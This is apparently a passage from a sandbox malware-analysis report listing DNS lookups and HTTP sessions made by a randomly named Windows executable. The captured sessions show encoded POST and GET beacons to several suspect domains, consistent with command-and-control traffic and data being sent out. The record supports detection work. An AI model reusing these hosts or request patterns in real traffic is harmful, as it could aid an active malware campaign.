Nov 7, 2024 15:29:58.045125961 CET | 1.1.1.1 | 192.168.2.8 | 0x4975 | No error (0) | www.es-lidl.online | es-lidl.online | | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 15:29:58.045125961 CET | 1.1.1.1 | 192.168.2.8 | 0x4975 | No error (0) | es-lidl.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49710 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:27:36.937261105 CET | 492 | OUT | GET /hfue/?sHS=543hApwHD&F2=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+Mnekgs9Dtqmg1if+oIl65BopybHLADU68if1oWKFmqENabDE70MA== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.multileveltravel.world
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Nov 7, 2024 15:27:37.581988096 CET | 404 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 07 Nov 2024 14:27:37 GMT
Content-Type: text/html
Content-Length: 264
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sHS=543hApwHD&F2=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+Mnekgs9Dtqmg1if+oIl65BopybHLADU68if1oWKFmqENabDE70MA=="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49712 | 74.208.236.25 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:27:52.695770025 CET | 756 | OUT | POST /sld7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.falconclub.online
Origin: http://www.falconclub.online
Cache-Control: max-age=0
Content-Length: 203
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.falconclub.online/sld7/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: F2=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bMLkcKhM5UMkGl4GFMBAYSflepN16f65ZU4RmDqo=
Nov 7, 2024 15:27:53.493556976 CET | 580 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 07 Nov 2024 14:27:53 GMT
Server: Apache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49713 | 74.208.236.25 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:27:55.243988991 CET | 776 | OUT | POST /sld7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.falconclub.online
Origin: http://www.falconclub.online
Cache-Control: max-age=0
Content-Length: 223
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.falconclub.online/sld7/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: F2=yu2LchvUcEpQzmFR7+CSy8ZNdAxG56+yOWQ7pFiwHoaIaLO86tpKG3ptOIEOp4BLzSRQhKdvKah4yhwq12VVrpXPhP3u25pjdl1w0/MEywht1KDK9qfgeLvDqACnMqsIo8TfKAHQefSFJ8Ynhgjp1HCm9NVFCMmxJZk0AXEqTvgrgOrvWjIeRfN1pOdMaNkxObBWd9/lf1ol6Abdv0QwIGCCPNtm
Nov 7, 2024 15:27:55.885152102 CET | 580 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Thu, 07 Nov 2024 14:27:55 GMT
Server: Apache
Content-Encoding: gzip
                                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      3 | 192.168.2.8 | 49714 | 74.208.236.25 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:27:57.790715933 CET | 1793 | OUT | POST /sld7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.falconclub.online
                                                                      Origin: http://www.falconclub.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.falconclub.online/sld7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 79 75 32 4c 63 68 76 55 63 45 70 51 7a 6d 46 52 37 2b 43 53 79 38 5a 4e 64 41 78 47 35 36 2b 79 4f 57 51 37 70 46 69 77 48 6f 53 49 62 34 32 38 37 4f 42 4b 46 33 70 74 56 49 45 4c 70 34 42 53 7a 53 49 59 68 4b 51 51 4b 59 70 34 77 44 6f 71 39 69 35 56 69 70 58 50 2b 66 33 74 72 70 70 4d 64 6c 6c 38 30 2f 63 45 79 77 68 74 31 49 72 4b 2b 37 66 67 59 4c 76 41 70 41 43 37 49 71 74 56 6f 38 4b 69 4b 44 72 71 65 4d 61 46 4d 73 49 6e 67 53 37 70 39 48 43 34 2b 4e 55 59 43 4a 2b 71 4a 5a 34 4a 41 58 59 45 54 76 59 72 6b 59 61 32 41 67 34 65 48 63 46 6b 75 64 52 36 5a 4d 73 6c 50 64 4e 4f 59 71 43 41 64 6a 49 4d 37 47 50 75 76 44 4a 39 56 51 75 45 42 6f 73 2b 45 58 58 47 75 37 36 6e 63 6f 7a 37 2b 4b 44 41 61 50 72 58 59 64 58 74 75 64 45 68 77 72 4b 33 45 67 4f 76 53 6e 64 47 68 54 35 51 31 48 39 35 30 77 44 58 4f 47 58 53 77 2b 68 75 4b 32 56 6c 34 73 77 71 38 64 44 6e 58 34 59 4e 43 46 52 37 78 71 50 6c 70 6d 57 55 50 67 67 55 68 47 55 6c 55 35 4b 2b 63 4f 62 4a 56 69 6b 43 55 49 41 47 49 55 65 [TRUNCATED]
                                                                      Data Ascii: F2= [TRUNCATED]
                                                                      Nov 7, 2024 15:27:58.397226095 CET | 580 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 07 Nov 2024 14:27:58 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.8 | 49715 | 74.208.236.25 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:00.333995104 CET | 487 | OUT | GET /sld7/?F2=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlzyIrvo6u+6+g1Ilwo5dhHoQBd/NfHtrD7TOfEhTSvK6UN8A==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.falconclub.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:28:00.977595091 CET | 770 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Content-Length: 626
                                                                      Connection: close
                                                                      Date: Thu, 07 Nov 2024 14:28:00 GMT
                                                                      Server: Apache
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.8 | 49727 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:06.056727886 CET | 753 | OUT | POST /abrg/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.promasterev.shop
                                                                      Origin: http://www.promasterev.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promasterev.shop/abrg/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 6e 36 55 75 30 35 55 6a 71 6c 37 62 6e 44 52 5a 51 62 4c 6e 33 4e 43 33 2f 35 65 47 64 43 32 6f 44 4b 4b 48 46 4b 45 79 70 6d 72 56 61 39 69 39 61 79 66 42 61 4b 4a 2f 66 71 37 69 56 35 71 55 4e 79 6b 33 4b 4f 4f 47 35 6a 6c 73 4a 74 4f 48 63 50 55 64 4b 78 65 78 47 6c 67 48 4d 38 43 6d 66 55 47 78 79 47 36 65 44 34 4d 46 4c 65 72 61 72 66 44 63 51 4d 47 72 57 72 43 69 67 38 48 4b 67 34 78 4d 73 52 70 45 63 36 63 66 70 32 33 55 30 76 6b 76 6c 63 6c 4a 6e 52 6e 4b 76 4e 71 66 68 35 4e 45 65 67 59 37 64 5a 51 5a 38 6b 35 50 54 68 62 4a 31 68 43 62 51 63 3d
                                                                      Data Ascii: F2=LloplUxxKxeX8n6Uu05Ujql7bnDRZQbLn3NC3/5eGdC2oDKKHFKEypmrVa9i9ayfBaKJ/fq7iV5qUNyk3KOOG5jlsJtOHcPUdKxexGlgHM8CmfUGxyG6eD4MFLerarfDcQMGrWrCig8HKg4xMsRpEc6cfp23U0vkvlclJnRnKvNqfh5NEegY7dZQZ8k5PThbJ1hCbQc=


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      6 | 192.168.2.8 | 49742 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:08.602761030 CET | 773 | OUT | POST /abrg/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.promasterev.shop
                                                                      Origin: http://www.promasterev.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promasterev.shop/abrg/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 48 71 55 76 54 74 55 6c 4b 6c 38 58 48 44 52 51 77 62 48 6e 33 4a 43 33 2b 39 4f 47 6f 71 32 6f 68 53 4b 56 30 4b 45 78 70 6d 72 62 36 39 72 35 61 79 75 42 61 32 42 2f 64 4f 37 69 57 46 71 55 4d 43 6b 33 37 4f 4e 48 70 6a 6e 68 70 74 41 61 73 50 55 64 4b 78 65 78 47 42 4f 48 4d 6b 43 6d 76 45 47 79 51 2b 39 55 6a 34 4e 41 4c 65 72 51 4c 65 72 63 51 4d 30 72 55 66 34 69 6a 55 48 4b 67 6f 78 4e 2b 70 6f 4e 63 36 53 52 4a 33 39 46 46 79 4b 72 6e 73 2b 55 33 42 55 4d 4f 31 6c 58 33 55 6e 65 38 6f 65 34 64 78 37 5a 2f 4d 50 4b 6b 38 7a 54 57 78 79 46 48 4a 65 78 48 58 4d 6b 66 76 75 6b 34 47 6c 49 61 65 78 4f 2f 69 66
                                                                      Data Ascii: F2=LloplUxxKxeX8HqUvTtUlKl8XHDRQwbHn3JC3+9OGoq2ohSKV0KExpmrb69r5ayuBa2B/dO7iWFqUMCk37ONHpjnhptAasPUdKxexGBOHMkCmvEGyQ+9Uj4NALerQLercQM0rUf4ijUHKgoxN+poNc6SRJ39FFyKrns+U3BUMO1lX3Une8oe4dx7Z/MPKk8zTWxyFHJexHXMkfvuk4GlIaexO/if


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      7 | 192.168.2.8 | 49758 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:11.150594950 CET | 1790 | OUT | POST /abrg/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.promasterev.shop
                                                                      Origin: http://www.promasterev.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promasterev.shop/abrg/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 48 71 55 76 54 74 55 6c 4b 6c 38 58 48 44 52 51 77 62 48 6e 33 4a 43 33 2b 39 4f 47 75 79 32 6f 51 79 4b 45 6e 79 45 77 70 6d 72 54 61 39 6d 35 61 79 7a 42 65 61 46 2f 64 43 42 69 51 42 71 55 75 4b 6b 2b 76 69 4e 4a 70 6a 6e 6f 4a 74 4e 48 63 50 37 64 4b 67 58 78 47 52 4f 48 4d 6b 43 6d 71 41 47 6c 53 47 39 62 44 34 4d 46 4c 65 76 61 72 65 51 63 57 6c 42 72 55 62 6f 69 53 30 48 4a 42 59 78 50 4e 52 6f 4d 38 36 51 63 70 32 6f 46 46 2b 4a 72 6e 77 45 55 30 63 63 4d 4a 5a 6c 48 78 51 35 47 4f 6b 49 6d 37 31 58 64 76 35 6b 46 31 77 72 59 6c 46 32 5a 6d 77 2f 39 69 37 41 69 4d 6a 38 75 37 58 50 63 63 75 37 45 5a 2b 54 79 55 58 73 4b 66 2b 70 6b 78 76 72 44 63 65 78 61 56 52 61 6c 54 58 6d 68 46 58 67 48 30 74 6f 35 6c 70 6c 78 47 6a 61 35 2b 7a 4d 52 4b 37 30 64 69 4d 51 70 31 49 74 30 4d 68 69 46 6c 45 6d 64 55 75 72 56 72 32 69 53 68 65 2b 75 4f 7a 78 47 66 44 37 37 4c 72 65 6c 57 2b 4e 79 46 62 31 73 42 31 75 31 33 58 44 64 47 52 76 50 77 76 6e 73 39 48 [TRUNCATED]
                                                                      Data Ascii: F2= [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      8 | 192.168.2.8 | 49775 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:13.693474054 CET | 486 | OUT | GET /abrg/?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.promasterev.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:28:14.356386900 CET | 404 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 07 Nov 2024 14:28:14 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 264
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 32 3d 47 6e 41 4a 6d 69 52 50 50 69 79 48 32 54 6d 66 75 42 56 6e 73 5a 6f 58 64 47 66 30 46 55 50 46 79 53 67 51 68 74 56 4f 4d 34 47 77 6e 44 71 39 44 6e 76 68 39 65 50 43 57 59 74 4a 78 4c 4c 41 55 2b 79 47 30 64 32 63 32 56 38 35 59 4d 69 46 33 75 2b 43 58 6f 53 2f 6c 70 31 39 4a 4e 65 46 66 35 46 65 71 32 73 39 4a 38 38 57 6c 66 41 65 78 67 4f 2f 55 79 74 66 41 4a 4f 34 53 4f 58 4a 47 51 3d 3d 26 73 48 53 3d 35 34 33 68 41 70 77 48 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHD"}</script></head></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      9 | 192.168.2.8 | 49807 | 3.33.130.190 | 80 | 5284 | C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 7, 2024 15:28:19.442677021 CET | 771 | OUT | POST /itly/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.childlesscatlady.today
                                                                      Origin: http://www.childlesscatlady.today
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.childlesscatlady.today/itly/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 64 72 32 52 72 59 46 6c 44 50 70 4e 79 4d 42 65 72 46 71 78 4a 37 63 4d 54 73 71 58 65 7a 61 2b 6c 41 41 46 6f 68 67 4b 45 59 63 58 56 2f 61 50 33 4b 51 50 39 68 6d 33 68 6b 31 61 64 64 4f 30 50 68 6e 52 31 59 4b 57 57 39 52 57 34 36 46 32 48 46 31 38 76 53 62 64 72 37 56 67 2b 42 43 4f 6c 73 69 74 76 4c 63 2b 59 48 41 4e 4b 78 41 34 74 31 48 6f 56 6c 78 59 36 35 32 73 6d 53 5a 4c 45 51 76 69 53 42 6e 67 70 36 67 42 65 4e 66 6e 61 75 4b 43 37 74 61 67 69 7a 35 37 45 56 4b 4b 30 59 6f 39 69 6f 57 77 41 73 4d 4d 42 59 41 6f 63 74 74 49 45 63 63 79 68 38 3d
                                                                      Data Ascii: F2=gu6he7xKy/oLfdr2RrYFlDPpNyMBerFqxJ7cMTsqXeza+lAAFohgKEYcXV/aP3KQP9hm3hk1addO0PhnR1YKWW9RW46F2HF18vSbdr7Vg+BCOlsitvLc+YHANKxA4t1HoVlxY652smSZLEQviSBngp6gBeNfnauKC7tagiz57EVKK0Yo9ioWwAsMMBYAocttIEccyh8=


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
